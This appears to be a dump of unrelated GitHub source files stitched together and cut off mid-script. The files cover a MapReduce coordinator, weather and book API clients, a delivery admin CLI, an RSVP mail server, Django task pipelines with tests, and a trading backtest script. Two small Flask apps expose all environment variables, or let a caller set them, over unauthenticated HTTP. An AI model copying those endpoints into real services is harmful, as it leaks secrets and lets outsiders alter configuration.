n_workers = input("Number of workers to perform the job? ")
print("Waiting for Workers...")
self.socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
self.socket.bind(("localhost", args.port))
self.socket.listen(5)
while len(self.ready_workers) < int(n_workers):
clientsocket, address = self.socket.accept()
json_msg = clientsocket.recv(1024).decode("utf-8")
if json_msg:
msg = json.loads(json_msg)
if msg["task"] == "register":
self.ready_workers.append(clientsocket)
print("Worker Connected")
for i in self.ready_workers:
process_messages = threading.Thread(target=self.jobs_to_do, args=(i,))
process_messages.start()
# process_messages = threading.Thread(target=self.jobs_to_do, args=(clientsocket,))
# process_messages.start()
if __name__ == '__main__':
parser = argparse.ArgumentParser(description='MapReduce Coordinator')
parser.add_argument('-p', dest='port', type=int, help='coordinator port', default=8765)
parser.add_argument('-f', dest='file', type=argparse.FileType('r', encoding='UTF-8'), help='input file path')
parser.add_argument('-o', dest='out', type=argparse.FileType('w', encoding='UTF-8'), help='output file path', default='output.csv')
parser.add_argument('-b', dest='blob_size', type=int, help='blob size', default=1024)
args = parser.parse_args()
Coordinator().main(args)
``` |
{
"source": "joaocps/pyipma",
"score": 3
} |
#### File: joaocps/pyipma/example.py
```python
import asyncio
import aiohttp
from pyipma.api import IPMA_API
from pyipma.location import Location
async def main():
async with aiohttp.ClientSession() as session:
api = IPMA_API(session)
location = await Location.get(api, 40.6517, -8.6573, sea_stations=True)
print("Forecast for {}".format(location.name))
print("Nearest station is {}".format(location.station))
print("Nearest sea station is {}".format(location.sea_station_name))
obs = await location.observation(api)
print("Current weather is {}".format(obs))
forecasts = await location.forecast(api)
print("Forecast for tomorrow {}".format(forecasts[0]))
sea_forecast = await location.sea_forecast(api)
print("Sea forecast for today {}".format(sea_forecast))
asyncio.get_event_loop().run_until_complete(main())
``` |
{
"source": "joaocps/tqs-clouddeliveries",
"score": 3
} |
#### File: joaocps/tqs-clouddeliveries/client.py
```python
import getpass
from External_service import CloudDeliveries
from pprint import pprint
import os
def print_loginmenu():
email = input("Username : ")
password = getpass.getpass("Enter Password : ")
return email, password
def print_menu():
print("1 - Drivers")
print("2 - Type Veichle")
print("3 - Veichle")
print("4 - Order")
option = input("option : ")
return option
def print_submenu():
print("1 - Get")
print("2 - Add")
print("3 - update")
print("4 - Delete")
option = input("option : ")
return option
def print_submenu_order():
print("1 - Get User Orders")
print("2 - Update State")
option = input("option : ")
return option
deliveries = CloudDeliveries()
email, password = print_loginmenu()
dic = deliveries.authenticate(email, password)
code, token = dic['status'], dic['token'].decode()
while code != 200:
email, password = print_loginmenu()
dic = deliveries.authenticate(email, password)
code, token = dic['status'], dic['token'].decode()
#print(token)
#os.system("cls")
option = "0"
while option != "10":
option = print_menu()
os.system("cls")
if option == "1": # Drivers
sub_option = print_submenu()
if sub_option == "1":
drivers = deliveries.getDrivers()
print([driver.toJSON() for driver in drivers])
elif sub_option == "2":
contact = input("introduza o contacto : ")
deliveries.addDriver(contact)
elif sub_option == "3":
idd = input("Introduza o id : ")
contact = input("introduza o contacto : ")
deliveries.updateDriver(idd, contact)
else:
idd = input("Introduza o id : ")
deliveries.deleteDriver(idd)
elif option == "2":
sub_option = print_submenu()
if sub_option == "1":
veichle_types = deliveries.getVeichleTypes()
print([v.toJSON() for v in veichle_types])
elif sub_option == "2":
name = input("introduza o nome : ")
capacidade = input("Introduza a capacidade : ")
deliveries.addVeichleType(name, capacidade)
elif sub_option == "3":
idd = input("Introduza o id : ")
name = input("introduza o nome : ")
capacidade = input("Introduza a capacidade : ")
deliveries.updateVeichleType(idd, name, capacidade)
else:
idd = input("Introduza o id : ")
deliveries.deleteVeichleType(idd)
elif option == '3':
sub_option = print_submenu()
if sub_option == "1":
veichles = deliveries.getVeichles()
print([v.toJSON() for v in veichles])
elif sub_option == "2":
id_type = input("introduza o id do tipo de veículo : ")
id_driver = input("Introduza o id do Driver : ")
deliveries.addVeichle(id_type, id_driver)
elif sub_option == "3":
idd = input("Introduza o id : ")
id_type = input("introduza o id do tipo de veículo : ")
id_driver = input("Introduza o id do Driver : ")
deliveries.updateVeichle(idd, id_type, id_driver)
else:
idd = input("Introduza o id : ")
deliveries.deleteVeichle(idd)
elif option == '4':
sub_option = print_submenu_order()
if sub_option == '1':
email = input("Introduza o email : ")
orders = deliveries.getOrders(email)
print(orders)
elif sub_option == '2':
idd = input("introduza o id da order : ")
state = input("Introduza o state da order (progress, deliver, finish) : ")
while not state in ['progress', 'deliver', 'finish']:
state = input("Introduza o state da order (progress, deliver, finish) : ")
deliveries.updateOrderState(idd, state)
print()
deliveries.logout()
```
#### File: joaocps/tqs-clouddeliveries/External_service.py
```python
import requests
import json
def decorator(method):
if method.__name__ in [ '__init__', 'getDriver', 'getDrivers', 'getVeichleType', 'getVeichleTypes', 'getVeichle','getVeichles', 'authenticate', 'logout', 'getOrders']:
return method
def func(self, *args, **kwargs):
result = method(self, *args, **kwargs)
if result.status_code != 200:
print("Argumentos Errados")
else:
print("Ordem efetuada com sucesso")
return func
def for_all_methods(decorator):
def decorate(cls):
for attr in cls.__dict__: # there's propably a better way to do this
if callable(getattr(cls, attr)):
setattr(cls, attr, decorator(getattr(cls, attr)))
return cls
return decorate
@for_all_methods(decorator)
class CloudDeliveries():
def __init__(self, base_url = 'http://192.168.160.6:8080/'):
self.base_url = base_url
def authenticate(self, email, password):
url = self.base_url + "user/admin/login/"
r = requests.post(url, json = {'email' : email, 'password' : password})
if r.status_code == 200:
return {'status' : r.status_code, 'token' : r.content}
print("Argumentos inválidos")
return {'status' : r.status_code, 'token' : "-1".encode()}
def logout(self, email):
url = self.base_url + "user/admin/logout/" + email
r = requests.delete(url)
if r.status_code == 200:
return r.content
print("Argumentos inválidos")
def addDriver(self, contact):
url = self.base_url + "driver/"
r = requests.post(url, json = {'contact' : contact})
return r
def deleteDriver(self, idd):
url = self.base_url + 'driver/' + str(idd) + '/';
r = requests.delete(url)
return r
def updateDriver(self, idd, contact):
url = self.base_url + 'driver/' + str(idd) + '/';
return requests.put(url, json = {'contact' : contact})
def getDriver(self, idd):
url = self.base_url + 'driver/' + str(idd) + '/';
return Driver(requests.get(url).content.decode())
def getDrivers(self):
url = self.base_url + 'driver/'
r = requests.get(url).json()
return [Driver(json.dumps(a)) for a in r]
def addVeichleType(self, name, capacity):
url = self.base_url + "typeveichle/"
r = requests.post(url, json = {'name' : name, 'capacity' : capacity})
return r
def deleteVeichleType(self, idd):
url = self.base_url + 'typeveichle/' + str(idd) + '/';
r = requests.delete(url)
return r
def updateVeichleType(self, idd, name, capacity):
url = self.base_url + 'typeveichle/' + str(idd) + '/';
r = requests.post(url, json = {'name' : name, 'capacity' : capacity})
return r
def getVeichleType(self, idd):
url = self.base_url + 'typeveichle/' + str(idd) + '/';
r = requests.get(url)
return
def getVeichleTypes(self):
url = self.base_url + 'typeveichle/'
r = requests.get(url).json()
return [VeichleType(json.dumps(a)) for a in r]
def addVeichle(self, id_type, id_driver):
url = self.base_url + "veichle/"
r = requests.post(url, json = {'id_veichle_type' : id_type, 'id_driver' : id_driver})
return r
def deleteVeichle(self, idd):
url = self.base_url + 'veichle/' + str(idd) + '/';
r = requests.delete(url)
return r
def updateVeichle(self, idd, id_type, id_driver):
url = self.base_url + 'veichle/' + str(idd) + '/';
return requests.put(url, json = {'id_veichle_type' : id_type, 'id_driver' : id_driver})
def getVeichle(self, idd):
url = self.base_url + 'veichle/' + str(idd) + '/';
return Veichle(requests.get(url).content.decode())
def getVeichles(self):
url = self.base_url + 'veichle/'
r = requests.get(url).json()
return [Veichle(json.dumps(a)) for a in r]
def getOrders(self, email):
url = self.base_url + 'order/user/' + email
r = requests.get(url)
content = r.content.decode()
return content
def updateOrderState(self, idd, state):
url = self.base_url + 'order/state/' + idd + '/' + state + '/'
r = requests.put(url)
return r
class Driver:
def __init__(self, j):
self.__dict__ = json.loads(j)
def toJSON(self):
return "id : " + str(self.id) + ", contact : " + str(self.contact)
class VeichleType:
def __init__(self, j):
self.__dict__ = json.loads(j)
def toJSON(self):
return json.dumps(self, default = lambda o : o.__dict__, sort_keys = True, indent = 4)
class Veichle:
def __init__(self, j):
self.__dict__ = json.loads(j)
def toJSON(self):
return json.dumps(self, default = lambda o : o.__dict__, sort_keys = True, indent = 4)
``` |
{
"source": "joaodaher/brunaefauzer",
"score": 3
} |
#### File: joaodaher/brunaefauzer/server.py
```python
import http.server
import json
from urllib import parse
import sendgrid
import os
from sendgrid.helpers.mail import *
FROM_EMAIL = os.environ.get('FROM_EMAIL', '<EMAIL>')
class Handler(http.server.SimpleHTTPRequestHandler):
def do_POST(self):
self.data_string = self.rfile.read(int(self.headers['Content-Length']))
data = parse.parse_qs(self.data_string.decode())
email = data['inputemail'][0]
amount = int(data['inputevents[]'][0]) - 1
message = data['inputmessage'][0]
name = data['inputname'][0]
response = self.send_rsvp(email=email, name=name, amount=amount, message=message)
if response.status_code == 202:
self.send_confirmation(email=email, name=name, amount=amount)
r = {
'type': 'success',
'text': "Seu RSVP foi enviado. Muito obrigado!",
}
else:
r = {
'type': 'error',
'text': "Tente novamente mais tarde. :(",
}
self.send_response(response.status_code)
self.send_header('Content-Type', 'application/json')
self.end_headers()
self.wfile.write(json.dumps(r).encode())
def send_rsvp(self, email, name, amount, message):
sg = sendgrid.SendGridAPIClient(apikey=os.environ.get('SENDGRID_API_KEY'))
from_email = Email(email)
subject = f"[RSVP] {name} + {amount}"
to_email = Email(FROM_EMAIL)
content = Content("text/plain", f"{message}")
mail = Mail(from_email, subject, to_email, content)
return sg.client.mail.send.post(request_body=mail.get())
def send_confirmation(self, email, name, amount):
sg = sendgrid.SendGridAPIClient(apikey=os.environ.get('SENDGRID_API_KEY'))
from_email = Email(FROM_EMAIL)
subject = f"Casamento Bruna & Fauzer"
to_email = Email(email)
extra = ""
plural = 's' if amount > 1 else ''
if amount:
extra = f"e mais {amount} pessoa{plural} "
message = f"""
{name},
Sua presença está confirmada no nosso casamento!
Aguardamos você {extra}no dia 17/11/2018.
Obrigado!
<NAME>
www.brunaefauzer.com.br
"""
content = Content("text/plain", f"{message}")
mail = Mail(from_email, subject, to_email, content)
return sg.client.mail.send.post(request_body=mail.get())
s = http.server.HTTPServer(('', int(os.environ.get('PORT', '8080'))), Handler)
s.serve_forever()
``` |
{
"source": "joaodaher/django-cloud-tasks",
"score": 2
} |
#### File: django-cloud-tasks/django_cloud_tasks/models.py
```python
from datetime import datetime
from typing import Optional, Dict
from django.db import transaction, models
from django.apps import apps
from django_cloud_tasks import tasks, serializers
class Pipeline(models.Model):
name = models.CharField(max_length=100)
def start(self):
routines = self.routines.filter(
models.Q(dependent_routines__id__isnull=True) & models.Q(status=Routine.Statuses.PENDING)
)
for routine in routines:
routine.enqueue()
def revert(self):
# TODO: Actually we don't know what to do when a routine with RUNNNING status is triggered
# to revert. We trust that it will not be a big deal for now. But would be great to support that soon
routines = self.routines.filter(
models.Q(next_routines__id__isnull=True) & ~models.Q(status=Routine.Statuses.REVERTED)
)
for routine in routines:
routine.revert()
def add_routine(self, routine: Dict) -> "Routine":
return self.routines.create(**routine)
class Routine(models.Model):
class Statuses(models.TextChoices):
PENDING = ("pending", "Pending")
SCHEDULED = ("scheduled", "Scheduled")
RUNNING = ("running", "Running")
COMPLETED = ("completed", "Completed")
FAILED = ("failed", "Failed")
REVERTING = ("reverting", "Reverting")
REVERTED = ("reverted", "Reverted")
# TODO: We have a signal to check if task_name defined does exists.
# We can do it with Django Field Validators
task_name = models.CharField(max_length=100)
pipeline = models.ForeignKey(
to="django_cloud_tasks.Pipeline",
related_name="routines",
on_delete=models.PROTECT,
)
body = models.JSONField(
default=dict,
encoder=serializers.JSONEncoder,
)
attempt_count = models.PositiveIntegerField(default=0)
max_retries = models.PositiveIntegerField(null=True)
output = models.JSONField(
null=True,
blank=True,
encoder=serializers.JSONEncoder,
)
starts_at = models.DateTimeField(null=True, blank=True)
ends_at = models.DateTimeField(null=True, blank=True)
status = models.CharField(
max_length=20,
choices=Statuses.choices,
default=Statuses.PENDING,
)
created_at = models.DateTimeField(
auto_now_add=True,
)
updated_at = models.DateTimeField(
auto_now=True,
)
next_routines = models.ManyToManyField(
to="Routine",
through="RoutineVertex",
through_fields=("routine", "next_routine"),
related_name="dependent_routines",
)
def fail(self, output: Dict):
self.output = output
self.status = self.Statuses.FAILED
self.ends_at = datetime.now()
self.save()
def complete(self, output: Dict):
self.output = output
self.status = self.Statuses.COMPLETED
self.ends_at = datetime.now()
self.save()
def enqueue(self):
with transaction.atomic():
self.status = self.Statuses.SCHEDULED
self.starts_at = datetime.now()
self.save()
def revert(self):
with transaction.atomic():
if self.status not in [self.Statuses.REVERTED, self.Statuses.REVERTING]:
self.status = self.Statuses.REVERTING
self.save()
def add_next(self, routine: Dict) -> "Routine":
routine["pipeline_id"] = self.pipeline_id
return self.next_routines.create(**routine)
@property
def task(self) -> Optional[tasks.Task]:
app = apps.get_app_config("django_cloud_tasks")
return app.get_task(name=self.task_name)
class RoutineVertex(models.Model):
next_routine = models.ForeignKey(
to="django_cloud_tasks.Routine",
on_delete=models.PROTECT,
related_name="required_routine_vertices",
)
routine = models.ForeignKey(
to="django_cloud_tasks.Routine",
related_name="next_routine_vertices",
on_delete=models.PROTECT,
)
class Meta:
constraints = [
models.UniqueConstraint(name="unique_routine_next_routine", fields=("next_routine", "routine")),
]
__all__ = (
"Routine",
"RoutineVertex",
"Pipeline",
)
```
#### File: sample_project/sample_app/apps.py
```python
from django.apps import AppConfig
class SampleAppConfig(AppConfig):
name = "sample_app"
def ready(self):
from sample_project.sample_app import tasks # pylint: disable=import-outside-toplevel,unused-import
```
#### File: sample_app/tests/tests_tasks.py
```python
from contextlib import ExitStack
import json
from unittest.mock import patch
from django.apps import apps
from django.test import SimpleTestCase, TestCase
from gcp_pilot.exceptions import DeletedRecently
from gcp_pilot.mocker import patch_auth
from django_cloud_tasks import exceptions
from django_cloud_tasks.tests import factories, tests_base
from django_cloud_tasks.tasks import PublisherTask, PipelineRoutineTask, PipelineRoutineRevertTask
from sample_project.sample_app import tasks
from sample_project.sample_app.tests.tests_base_tasks import patch_cache_lock
class TasksTest(SimpleTestCase):
def patch_push(self, **kwargs):
return patch("gcp_pilot.tasks.CloudTasks.push", **kwargs)
def test_registered_tasks(self):
app_config = apps.get_app_config("django_cloud_tasks")
expected_tasks = {
"PublisherTask",
"CalculatePriceTask",
"FailMiserablyTask",
"OneBigDedicatedTask",
"PipelineRoutineTask",
"SayHelloTask",
"SayHelloWithParamsTask",
"DummyRoutineTask",
"RoutineLockTaskMixin",
"PipelineRoutineRevertTask",
}
self.assertEqual(expected_tasks, set(app_config.on_demand_tasks))
expected_tasks = {"SaySomethingTask"}
self.assertEqual(expected_tasks, set(app_config.periodic_tasks))
expected_tasks = {"PleaseNotifyMeTask"}
self.assertEqual(expected_tasks, set(app_config.subscriber_tasks))
def test_get_task(self):
app_config = apps.get_app_config("django_cloud_tasks")
self.assertEqual(PublisherTask, app_config.get_task(name="PublisherTask"))
def test_get_task_not_found(self):
app_config = apps.get_app_config("django_cloud_tasks")
with self.assertRaises(exceptions.TaskNotFound):
app_config.get_task(name="PotatoTask")
def test_task_async(self):
with self.patch_push() as push:
with patch_auth():
tasks.CalculatePriceTask().delay(price=30, quantity=4, discount=0.2)
expected_call = dict(
queue_name="tasks",
url="http://localhost:8080/tasks/CalculatePriceTask",
payload=json.dumps({"price": 30, "quantity": 4, "discount": 0.2}),
)
push.assert_called_once_with(**expected_call)
def test_task_async_only_once(self):
with self.patch_push() as push:
with patch_auth():
tasks.FailMiserablyTask().delay(magic_number=666)
expected_call = dict(
task_name="FailMiserablyTask",
queue_name="tasks",
url="http://localhost:8080/tasks/FailMiserablyTask",
payload=json.dumps({"magic_number": 666}),
unique=False,
)
push.assert_called_once_with(**expected_call)
def test_task_async_reused_queue(self):
effects = [DeletedRecently("Queue tasks"), None]
with self.patch_push(side_effect=effects) as push:
with patch_auth():
tasks.CalculatePriceTask().delay(price=30, quantity=4, discount=0.2)
expected_call = dict(
queue_name="tasks",
url="http://localhost:8080/tasks/CalculatePriceTask",
payload=json.dumps({"price": 30, "quantity": 4, "discount": 0.2}),
)
expected_backup_call = expected_call
expected_backup_call["queue_name"] += "--temp"
self.assertEqual(2, push.call_count)
push.assert_any_call(**expected_call)
push.assert_called_with(**expected_backup_call)
def test_task_eager(self):
with self.settings(EAGER_TASKS=True):
with patch_auth():
response = tasks.CalculatePriceTask().delay(price=30, quantity=4, discount=0.2)
self.assertGreater(response, 0)
class PipelineRoutineRevertTaskTest(TestCase):
_mock_lock = None
def setUp(self):
super().setUp()
patched_settings = self.settings(EAGER_TASKS=True)
patched_settings.enable()
self.addCleanup(patched_settings.disable)
stack = ExitStack()
self.mock_lock = stack.enter_context(patch_cache_lock())
def test_process_revert_and_update_routine_to_reverted(self):
routine = factories.RoutineWithoutSignalFactory(
status="reverting",
task_name="SayHelloTask",
output={"spell": "Obliviate"},
)
with patch("sample_project.sample_app.tasks.SayHelloTask.revert") as revert:
PipelineRoutineRevertTask().delay(routine_id=routine.pk)
revert.assert_called_once_with(data=routine.output)
routine.refresh_from_db()
self.assertEqual(routine.status, "reverted")
class PipelineRoutineTaskTest(TestCase):
_mock_lock = None
def setUp(self):
super().setUp()
patched_settings = self.settings(EAGER_TASKS=True)
patched_settings.enable()
self.addCleanup(patched_settings.disable)
stack = ExitStack()
self.mock_lock = stack.enter_context(patch_cache_lock())
def assert_routine_lock(self, routine_id: int):
self.mock_lock.assert_called_with(
key=f"lock-PipelineRoutineTask-{routine_id}",
timeout=60,
blocking_timeout=5,
)
def tests_dont_process_completed_routine(self):
routine = factories.RoutineWithoutSignalFactory(
status="completed",
task_name="SayHelloTask",
)
with self.assertLogs(level="INFO") as context:
PipelineRoutineTask().delay(routine_id=routine.pk)
self.assert_routine_lock(routine_id=routine.pk)
self.assertEqual(context.output, [f"INFO:root:Routine #{routine.pk} is already completed"])
def tests_start_pipeline_revert_flow_if_exceeded_retries(self):
routine = factories.RoutineWithoutSignalFactory(
status="running",
task_name="SayHelloTask",
max_retries=1,
attempt_count=2,
)
with patch("django_cloud_tasks.models.Pipeline.revert") as revert:
with self.assertLogs(level="INFO") as context:
PipelineRoutineTask().delay(routine_id=routine.pk)
self.assertEqual(
context.output,
[
f"INFO:root:Routine #{routine.id} has exhausted retries and is being reverted",
],
)
self.assert_routine_lock(routine_id=routine.pk)
revert.assert_called_once()
def tests_store_task_output_into_routine(self):
routine = factories.RoutineWithoutSignalFactory(
status="running",
task_name="SayHelloTask",
body={"attributes": [1, 2, 3]},
attempt_count=1,
)
with self.assertLogs(level="INFO") as context:
PipelineRoutineTask().run(routine_id=routine.pk)
self.assert_routine_lock(routine_id=routine.pk)
routine.refresh_from_db()
self.assertEqual(
context.output,
[
f"INFO:root:Routine #{routine.id} is running",
f"INFO:root:Routine #{routine.id} just completed",
],
)
self.assertEqual("completed", routine.status)
self.assertEqual(2, routine.attempt_count)
def tests_fail_routine_if_task_has_failed(self):
routine = factories.RoutineWithoutSignalFactory(
status="running",
task_name="SayHelloTask",
body={"attributes": [1, 2, 3]},
attempt_count=1,
)
with self.assertLogs(level="INFO") as context:
with patch("sample_project.sample_app.tasks.SayHelloTask.run", side_effect=Exception("any error")):
with patch("django_cloud_tasks.models.Routine.enqueue") as enqueue:
PipelineRoutineTask().run(routine_id=routine.pk)
self.assert_routine_lock(routine_id=routine.pk)
routine.refresh_from_db()
self.assertEqual(
context.output,
[
f"INFO:root:Routine #{routine.id} is running",
f"INFO:root:Routine #{routine.id} has failed",
f"INFO:root:Routine #{routine.id} has been enqueued for retry",
],
)
self.assertEqual("failed", routine.status)
enqueue.assert_called_once()
self.assertEqual(2, routine.attempt_count)
class SayHelloTaskTest(TestCase, tests_base.RoutineTaskTestMixin):
@property
def task(self):
return tasks.SayHelloTask
class SayHelloWithParamsTaskTest(TestCase, tests_base.RoutineTaskTestMixin):
@property
def task(self):
return tasks.SayHelloWithParamsTask
@property
def task_run_params(self):
return {"spell": "Obliviate"}
``` |
{
"source": "joaodartora/devops-sandbox",
"score": 3
} |
#### File: python/http-create-env-var/create_env_var.py
```python
import os
from flask import Flask
app = Flask(__name__)
@app.route("/env/<name>/<var>")
def set_env_var(name, var):
os.environ[name] = str(var)
return os.environ.get(name)
if __name__=='__main__':
app.run(debug=True, port=8080)
```
#### File: python/http-env-vars/http_env_vars.py
```python
import os
from flask import Flask
app = Flask(__name__)
@app.route("/conf/env")
def list_env_vars():
return str(os.environ)
if __name__=='__main__':
app.run(debug=True, port=8080)
``` |
{
"source": "joaodartora/random-greetings",
"score": 3
} |
#### File: joaodartora/random-greetings/random_greetings_test.py
```python
import unittest
import random_greetings
class RandomGreetings(unittest.TestCase):
# abrir_csv
def test_abrir_csv_com_sucesso_validando_numero_linhas(self):
arquivo_csv = random_greetings.abrir_csv("test/lista_correta.csv")
numero_linhas = sum(1 for linha in arquivo_csv)
self.assertEqual(numero_linhas, 10345)
def test_abrir_csv_sem_linhas_deve_retornar_zero_linhas(self):
arquivo_csv = random_greetings.abrir_csv("test/lista_vazia.csv")
numero_linhas = sum(1 for linha in arquivo_csv)
self.assertEqual(numero_linhas, 0)
# buscar_termos_validos
def test_buscar_termos_validos_com_sucesso_deve_retornar_numero_correto_de_elementos(self):
arquivo_csv = random_greetings.abrir_csv("test/lista_correta.csv")
lista_termos = random_greetings.buscar_termos_validos(arquivo_csv)
self.assertEqual(len(lista_termos), 9684)
def test_buscar_termos_validos_com_apenas_2_colunas_arquivo_deve_retornar_lista_vazia(self):
arquivo_csv = random_greetings.abrir_csv("test/lista_com_2_colunas.csv")
lista_termos = random_greetings.buscar_termos_validos(arquivo_csv)
self.assertEqual(len(lista_termos), 0)
def test_buscar_termos_validos_sem_elementos_validos_deve_retornar_lista_vazia(self):
arquivo_csv = random_greetings.abrir_csv("test/lista_apenas_familias.csv")
lista_termos = random_greetings.buscar_termos_validos(arquivo_csv)
self.assertEqual(len(lista_termos), 0)
# definir_saudacao
def test_definir_saudacao_madrugada_com_sucesso(self):
self.assertEqual(random_greetings.definir_saudacao(3), "Boa madrugada")
def test_definir_saudacao_dia_com_sucesso(self):
self.assertEqual(random_greetings.definir_saudacao(7), "Bom dia")
def test_definir_saudacao_tarde_com_sucesso(self):
self.assertEqual(random_greetings.definir_saudacao(13), "Boa tarde")
def test_definir_saudacao_noite_com_sucesso(self):
self.assertEqual(random_greetings.definir_saudacao(19), "Boa noite")
# montar_response
def test_montar_response_com_sucesso(self):
cumprimento = "Boa noite, meu Esmaltador de metais não-preciosos"
self.assertEqual(random_greetings.montar_response(cumprimento).decode(), '{"cumprimento": "Boa noite, meu Esmaltador de metais não-preciosos"}')
if __name__ == '__main__':
unittest.main()
``` |
{
"source": "joaodath/kan",
"score": 3
} |
#### File: kan/kan/structures.py
```python
import json
from abc import abstractmethod, ABCMeta, abstractproperty
from contextlib import contextmanager
try:
from urllib.request import urlopen, Request
from urllib.parse import urlencode
from urllib.error import HTTPError
except ImportError:
from urllib2 import urlopen, Request, HTTPError
from urllib import urlencode
__all__ = [
'AbstractBaseAPIClient',
'GoogleBooksAPIClient',
]
class AbstractBaseAPIClient:
"""
AbstractBaseAPIClient that specifies the abstractmethods
necessary to propertly be handled.
The AbstractBaseClass defines a minimal set of methods that establish
the characteristic behavior for the APIClient.
Code that discriminates based on Abstract methods can trust that
those methods will always be present.
"""
__metaclass__ = ABCMeta
@abstractproperty
def url(self):
"""
Routes to proper destination URL and proper encoding schemes.
:return url: str
"""
return
@abstractmethod
def connect(self):
"""
Makes connection to the backend API and handles any exceptions.
"""
return
@abstractproperty
def reader(self):
"""
Reads content.
:return text: str
"""
return
class GoogleBooksAPIClient(AbstractBaseAPIClient):
"""
Implements the AbstractBaseAPIClient and talks to the google books
api for querying and finding books.
:param title: str
:param author: str
:param max_results: int
:param start_index: int
:param language_code: str
:param fields: tuple
:return self: **GoogleBooksAPIClient**
"""
def __init__(self,
title='',
author='',
max_results=10,
start_index=0,
language_code='',
fields=tuple(),
):
self.title = title
self.author = author
self.max_results = max_results
self.start_index = start_index
self.language_code = language_code
self.fields = fields
@property
def url(self):
base = r'https://www.googleapis.com/books/v1/volumes'
query = r''
if self.title:
query = '"{0}"'.format(':'.join(['intitle', self.title]))
if self.author:
authors = '"{0}"'.format(':'.join(['inauthor', self.author]))
query = '+'.join([query, authors]).strip('+')
# Encode Parameters
params = urlencode({
'q': query,
'startIndex': self.start_index,
'maxResults': self.max_results,
'langRestrict': self.language_code,
})
# Optimizes amount of data requested
fieldstring = 'fields={prefix}({fields})'.format(
prefix='/'.join(['items', 'volumeInfo']),
fields=','.join(('authors', 'title', 'industryIdentifiers', 'publisher', 'publishedDate', 'pageCount',) + self.fields),
)
return '&'.join(['?'.join([base, params]), fieldstring])
@contextmanager
def connect(self, agent='Python'):
"""
Context manager for HTTP Connection state and ensures proper handling
of network sockets, sends a GET request.
Exception is raised at the yield statement.
:yield request: FileIO<Socket>
"""
headers = {'User-Agent': agent}
request = urlopen(Request(self.url, headers=headers))
try:
yield request
finally:
request.close()
@property
def reader(self):
"""
Reads raw text from the connection stream.
Ensures proper exception handling.
:return bytes: request
"""
request_stream = ''
with self.connect() as request:
if request.msg != 'OK':
raise HTTPError
request_stream = request.read().decode('utf-8')
return request_stream
@property
def json(self):
"""
Serializes json text stream into python dictionary.
:return dict: json
"""
_json = json.loads(self.reader)
if _json.get('error', None):
raise HTTPError(_json['error']['errors'])
return _json
``` |
{
"source": "joaodinissf/prim-benchmarks",
"score": 4
} |
#### File: baselines/gpu/cpu_lib.py
```python
def binary_search(arr, search):
L = 0
R = len(arr)
while (L <= R):
if L > R:
return -1 #Error code 1
m = (L + R) / 2
if (arr[m] < search):
L = m + 1
elif (arr[m] > search):
R = m - 1
else:
return m
return -2 #Error code 2
``` |
{
"source": "joaodmrodrigues/elements-financial-machine-learning",
"score": 3
} |
#### File: elements-financial-machine-learning/__writing/script_backtest_statistics_part1.py
```python
import yfinance as yf
sp500 = yf.Ticker("^GSPC")
data = sp500.history(period="10y", interval="1d")
import matplotlib.pyplot as plt
selected_data = data[data.index>="2015-01-01"]
selected_data = selected_data[selected_data.index<="2020-12-31"]
returns = selected_data["Close"].pct_change().to_numpy()[1:]
N = len(returns)
import numpy as np
n_profit = int(0.51*N)
n_loss = N-n_profit
aux = np.array([1]*n_profit + [-1]*n_loss)
hit = np.random.permutation(aux)
strategy_returns = np.abs(returns) * hit
# Portfolio growth
portfolio_growth = 1+np.cumsum(strategy_returns)
# Plot
#fig, axes = plt.subplots(1, 2, figsize=(10, 4))
#axes[0].plot(selected_data["Close"], color=(0.8,0.5,0.5,1.0))
#axes[0].set_xlabel("Date")
#axes[0].set_ylabel("SP500")
#axes[1].plot(portfolio_growth, color=(0.5,0.5,0.8,1.0))
#axes[1].set_xlabel("Date")
#axes[1].set_ylabel("Portfolio value")
#plt.show()
# Metrics
total_return = np.sum(strategy_returns)
sharp_ratio = np.sqrt(252)*np.mean(strategy_returns)/np.std(strategy_returns)
print("Strategy total return =", np.round(total_return, 2))
print("Strategy Sharp ratio =", np.round(sharp_ratio, 2))
##### Monte Carlo
def calculate_performance_realizations(returns, hit_ratio, backtest_length, n_realizations):
realizations = list()
total_returns = list()
sharp_ratios = list()
N = len(returns)
n_profit = int(hit_ratio*N)
n_loss = N-n_profit
aux = np.array([1]*n_profit + [-1]*n_loss)
for i in range(0, n_realizations):
hit = np.random.permutation(aux)
strategy_returns = np.abs(returns)*hit
strategy_returns = np.random.permutation(strategy_returns)[0:backtest_length]
realizations.append(strategy_returns)
total_returns.append(np.sum(strategy_returns))
sharp_ratios.append(np.sqrt(252)*np.mean(strategy_returns)/np.std(strategy_returns))
return (np.array(realizations), np.array(total_returns), np.array(sharp_ratios))
(realizations, total_returns, sharp_ratios) = calculate_performance_realizations(returns=returns, hit_ratio=0.50, backtest_length=252, n_realizations=10000)
percentage_profitable = np.sum(total_returns>=0)/len(total_returns)
print(percentage_profitable)
## Sharp ratio statistics
pdf, bins, patches = plt.hist(x=sharp_ratios, bins=int(len(sharp_ratios)**(1/3)), density=True)
pdf = pdf / np.sum(pdf)
cmf = np.cumsum(pdf)
fig, axes = plt.subplots(1, 1, figsize=(5, 4))
axes.plot(bins[0:-1], 1-cmf, color=(0.8,0.5,0.5,1.0))
axes.set_xlabel("Sharp ratio")
axes.set_ylabel("1-Cumulative mass function")
#axes.set_yscale("log")
plt.show()
#### Case
case_index = np.argsort(sharp_ratios)[-3]
case_realization = realizations[case_index, :]
portfolio_growth = 1+np.cumsum(case_realization)
plt.plot(portfolio_growth)
plt.show()
dfgdf
###### Surface plot
hit_ratios = np.linspace(0.5, 0.6, 10)
backtest_lengths = np.arange(50, 252, 10)
ratio_profitable_strategies = list()
for hit_ratio in hit_ratios:
print(hit_ratio)
aux = list()
for backtest_length in backtest_lengths:
(realizations, total_returns, sharp_ratios) = calculate_performance_realizations(returns=returns, hit_ratio=hit_ratio, backtest_length=backtest_length, n_realizations=1000)
percentage_profitable = np.sum(total_returns>=0)/len(total_returns)
aux.append(percentage_profitable)
ratio_profitable_strategies.append(aux)
ratio_profitable_strategies = np.array(ratio_profitable_strategies).T
### Plot
fig, axes = plt.subplots(1, 1, figsize=(5, 4))
# handle for displaying the colorbar
Z = [[0,0],[0,0]]
levels = np.linspace(hit_ratios[0], hit_ratios[-1], 40)
# color options
colormap_set = 'coolwarm'
from matplotlib import cm
colormap = cm.ScalarMappable(norm=None, cmap=colormap_set)
colormap.set_clim(vmin=np.min(hit_ratios), vmax=np.max(hit_ratios))
dummy = axes.contourf(Z, levels, cmap=colormap_set)
axes.cla()
cbar = plt.colorbar(dummy, format='%.2f')
